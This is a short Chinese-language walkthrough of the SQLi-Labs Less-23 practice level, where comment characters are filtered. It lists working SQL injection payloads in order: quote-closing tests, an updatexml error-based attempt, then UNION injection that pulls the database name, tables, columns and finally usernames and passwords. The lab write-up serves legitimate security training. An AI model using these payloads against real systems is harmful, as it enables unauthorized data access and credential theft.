SQL注入 Less23(过滤注释符)

?id=1

?id=1'

''1'' LIMIT 0,1'
先去掉左右两边各一个单引号，相当于语文中的引用
'1'' LIMIT 0,1
很明显知道是单引号闭合

SELECT * FROM users WHERE id='$id' LIMIT 0,1
因为过滤了注释符，我们可以手动闭合后面的单引号

?id=1' and '1'='1

?id=1' and '1'='2

想使用报错注入的，因为是会有报错信息的

?id=1' and updatexml(1, concat('#', database()), 1) and '1'='1

最后可能会多出了Limit 0,1这部分，导致语句出错了

所以放弃报错注入

尝试使用union注入，因为是有回显点的
?id=1' order by 4 and '1'='1

查不出字段数

直接使用union，来逐个测试字段数
?id=1' union select 1,'2

确实是可以的
?id=1' union select 1,2,'3

查看回显位置
?id=-1' union select 1,2,'3

查数据库
?id=-1' union select 1,(select concat(database(), 0x7e, @@basedir)),'3

查表
?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security"),'3

查字段
?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),'3

查数据
?id=-1' union select 1, (select group_concat(username,0x3a,password) from security.users),'3